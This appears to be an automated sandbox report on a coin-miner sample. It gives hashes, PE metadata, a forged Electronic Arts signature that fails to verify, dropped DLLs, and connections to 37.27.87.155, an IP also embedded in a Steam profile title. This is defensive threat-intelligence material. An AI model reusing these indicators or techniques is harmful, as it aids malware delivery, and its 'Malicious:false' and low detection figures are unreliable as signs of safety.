                                                                                                                                                                                                                                                                          SSDEEP:768:sdpqm+0Iz3YAA9CWGtwfcDAXZ4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKh2SE:sd8m+0Iz3YAA9CWGtwFXZ4VWBCW3KI8e
                                                                                                                                                                                                                                                                          MD5:5C978DC33DB6D33FCA06F996902CC557
                                                                                                                                                                                                                                                                          SHA1:A6EA7B5AC21D4F4B472617608B879B8A739AF40D
                                                                                                                                                                                                                                                                          SHA-256:3DB199A8FD77D8CA57CCB3A1BACBC42DD8DEC8D103F2E9C045FE8CB863328F3C
                                                                                                                                                                                                                                                                          SHA-512:60A8E93D8B9C33FB8C0D2AED6CEDCC5E2D1276C128F1226B14D738D0591474179F39C8463377E5C07AE5BF3796722D9F4C56F28E9FC351D3B5B47526ED6FED35
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: ve74r https://37.27.87.155|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hre
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2459136
                                                                                                                                                                                                                                                                          Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                                                          MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                                                          SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                                                          SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                                                          SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Entropy (8bit):7.771743518480777
                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                          File name:SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                                                                                                                                                                                                                                                                          File size:2'952'808 bytes
                                                                                                                                                                                                                                                                          MD5:7f1e688e77760ad29c560404a2fb9d2f
                                                                                                                                                                                                                                                                          SHA1:7c06e05c8e13d01df26653cbe12695af139c5854
                                                                                                                                                                                                                                                                          SHA256:086bcb65380fa0e4d23c07fbff58863949f8158b87d07cd6eac6485d99b3bf0d
                                                                                                                                                                                                                                                                          SHA512:e841524c36ec9f550bbd299fbd33bbf15587dde922c747ae719bea03c387e62bbb9a73fdee0188dfb1586cca5b9dc81745144e633ed3dcb661434ab1c87e393e
                                                                                                                                                                                                                                                                          SSDEEP:49152:lAfXmQ/GT5+pDEuOwHLHE83/G9+SbSyCfHtl8/ioefjKxAd2jVAeIXT:2+4GT0OSL04Dl8/gcAsJAeIj
                                                                                                                                                                                                                                                                          TLSH:B1D5F1DAE5C5D542FA6E17B19186F77840699FED32069A1685F48CE3B211F8B2C33833
                                                                                                                                                                                                                                                                          Icon Hash:e8c486932380c060
Entrypoint:0x66fd6e
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x6622B46C [Fri Apr 19 18:14:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Signature Valid:false
Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
• 04/05/2023 01:00:00 07/05/2026 00:59:59
Subject Chain
• CN="Electronic Arts, Inc.", OU=EAC, O="Electronic Arts, Inc.", L=Redwood City, S=CALIFORNIA, C=US
Version:3
Thumbprint MD5:33BD4710688F5874BAC612E52BCCEEA8
Thumbprint SHA-1:A46E87AEBD8693AE8B3B2F26449F8828368B4D4F
Thumbprint SHA-256:0F952F3F6AF7C5B1FE753761AD34E2C360930EF530EB6A753AB461046F79C049
Serial:0671352DC4C103B70AE725E954486374
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x26fd20 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x270000 | 0x60400 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x2ce600 | 0x2868 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2d2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x26dd74 | 0x26de00 | 2452b198dcf9b2bcd476624818cee2e3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x270000 | 0x60400 | 0x60400 | 836d98483ef186103616eb3c0a2abf27 | False | 0.2370408887987013 | data | 5.0618585646992935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2d2000 | 0xc | 0x200 | ffe6eb157eba8b42fcca8c96dde60171 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x270268 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.675531914893617
RT_ICON | 0x2706d0 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.5127504553734062
RT_ICON | 0x2717f8 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.4422294548413344
RT_ICON | 0x273e60 | 0x4428 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.3707588262265016
RT_ICON | 0x278288 | 0x11028 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.2691325066023654
RT_ICON | 0x2892b0 | 0x44028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144 | English | United States | 0.2024424915998966
RT_MESSAGETABLE | 0x2cd2d8 | 0x2840 | data | English | United States | 0.28823757763975155
RT_GROUP_ICON | 0x2cfb18 | 0x5a | data | English | United States | 0.7444444444444445
RT_VERSION | 0x2cfb74 | 0x308 | data | English | United States | 0.47036082474226804
RT_MANIFEST | 0x2cfe7c | 0x4d2 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminators | English | United States | 0.47568881685575365

DLL | Import
mscoree.dll | _CorExeMain

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.590502024 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.590529919 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.057231903 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.057322979 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.057765961 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.057777882 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.059393883 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.059400082 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.939333916 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.939523935 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.939672947 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.939672947 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.939673901 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.941036940 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.941128016 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.941222906 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.941401958 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.941425085 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:11.244553089 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:11.244616032 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:11.382587910 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:11.382678986 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:11.383150101 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:11.383171082 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:11.384746075 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:11.384757042 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.242146015 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.242208004 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.242248058 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.242268085 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.242295027 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.242305994 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.242362022 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.242419004 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.327518940 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.327533007 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.332331896 CEST49735443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.332413912 CEST4434973537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.332515955 CEST49735443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.332843065 CEST49735443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.332921982 CEST4434973537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.768079042 CEST4434973537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.768168926 CEST49735443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.971951008 CEST49735443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.972002029 CEST4434973537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.973571062 CEST49735443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:12.973577976 CEST4434973537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:13.600596905 CEST4434973537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:13.600661039 CEST4434973537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:13.600759029 CEST49735443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:13.600759029 CEST49735443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:13.600820065 CEST4434973537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:13.600862980 CEST4434973537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:13.600871086 CEST49735443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:13.600928068 CEST49735443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:13.605617046 CEST49735443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:13.605645895 CEST4434973537.27.87.155192.168.2.4
